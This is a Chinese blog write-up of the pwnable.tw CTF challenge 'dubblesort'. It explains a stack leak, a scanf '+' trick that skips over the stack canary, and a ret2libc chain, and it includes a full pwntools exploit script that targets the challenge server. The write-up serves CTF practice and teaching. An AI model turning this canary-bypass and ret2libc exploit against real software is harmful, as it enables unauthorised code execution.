Pwnable.tw dubblesort

Pwnable.tw dubblesort

最近总是想写点东西,想来想去还是pwnable.tw上的题目值得记录,因此准备写个series,就从200分的dubblesort开始吧😝

32位的程序,题目名是dubblesort冒泡排序,先分析一波:

1
2
3
__printf_chk(1, (int)"What your name :");
  read(0, &buf, 0x40u);
  __printf_chk(1, (int)"Hello %s,How many numbers do you what to sort :");

开始的name输入到stack上,read没有’\0’截断,因此可用来泄露栈里的数据,多为libc。

之后程序让我们输入sort number和number,这些数据都是存放在stack上的,然后执行sort()函数进行冒泡排序。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
__printf_chk(1, (int)"Hello %s,How many numbers do you what to sort :");
__isoc99_scanf("%u", &v9);
count = v9;
if ( v9 )
{
  v4 = &nums;
  v5 = 0;
  do
  {
    __printf_chk(1, (int)"Enter the %d number : ");
    fflush(stdout);
    __isoc99_scanf("%u", v4);
    ++v5;
    count = v9;
    ++v4;
  }
  while ( v9 > v5 );
}
sort((unsigned int *)&nums, count);
puts("Result :");

由于输入的数量由我们控制,那就可以栈溢出了,难点在于程序开启了canary,因此我们要做的就是如何能够不改掉canary同时覆盖返回地址,并且在sort()后这些数据还能再对应的位置上(可能因为大小问题而被交换之类的)📍

在执行__isoc99_scanf(“%u”, v4);时,当我尝试输入一些非法的字符如’#’,由于”%u”表示接收数据格式为无符号的整形,因此视’#’为非法的字符,从而scanf执行失败,栈上对应的数据没有被修改,但也导致它留在了stdin里使得后面循环的scanf也无法正确执行,那有没有什么字符可以使得scanf视其为合法字符却不修改stack的数据呢?

网上查找一番了解到’+’和’-‘可以🎉。原因在于这两个符号用于定义正数和负数,当输入+4时会视为4,-4会视为无符号的0x100000000-4,因此当我们只输入’+’时,由于我们实际上什么也没输入,自然也就不会改写stack上的数据。

因此我们可以在canary前写入’0’,canary处写入’+’,cananry后面到ebp写str(0xf0000000),ret_addr写system,然后写两个libc中’/bin/sh’的地址,这样构造的话sort()完其位置将不会因交换而改变(没有发生交换),从而能拿到flag🚩

EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import *
DEBUG=0
context.log_level='debug'
if DEBUG:
	# r=process("./dubblesort",env={"LD_PRELOAD":"../libc_32.so.6"})
	p=process("./dubblesort")
	libc=ELF("/lib/i386-linux-gnu/libc.so.6")

else:
	p=remote("chall.pwnable.tw",10101)
	libc=ELF("../libc_32.so.6")
# gdb.attach(p)
# pause()
got_plt_offset = 0x1b0000

# leak libc address
payload_1 = "a"*24
p.recv()
p.sendline(payload_1)
libc_addr = u32(p.recv()[30:34])-0xa
libc_address = libc_addr - got_plt_offset
# libc_address=u32(p.recv(4))-0x1b3061

info("libc: "+hex(libc_address))

# p.recvuntil('sort :')
p.sendline(str(35))

for _ in range(24):
	p.recvuntil("number : ")
	p.sendline(str(0))

p.recvuntil("number : ")
p.sendline('+')

for _ in range(7):
	p.recvuntil("number : ")
	p.sendline(str(0xf0000000))
# gdb.attach(p)
p.recvuntil("number : ")
p.sendline(str(libc.sym['system']+libc_address))
p.recvuntil("number : ")
# p.sendline(str(libc.sym['system']+libc_address+1))
p.sendline(str(libc_address+libc.search('/bin/sh').next()))
p.recvuntil("number : ")
p.sendline(str(libc_address+libc.search('/bin/sh').next()))


p.interactive()

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>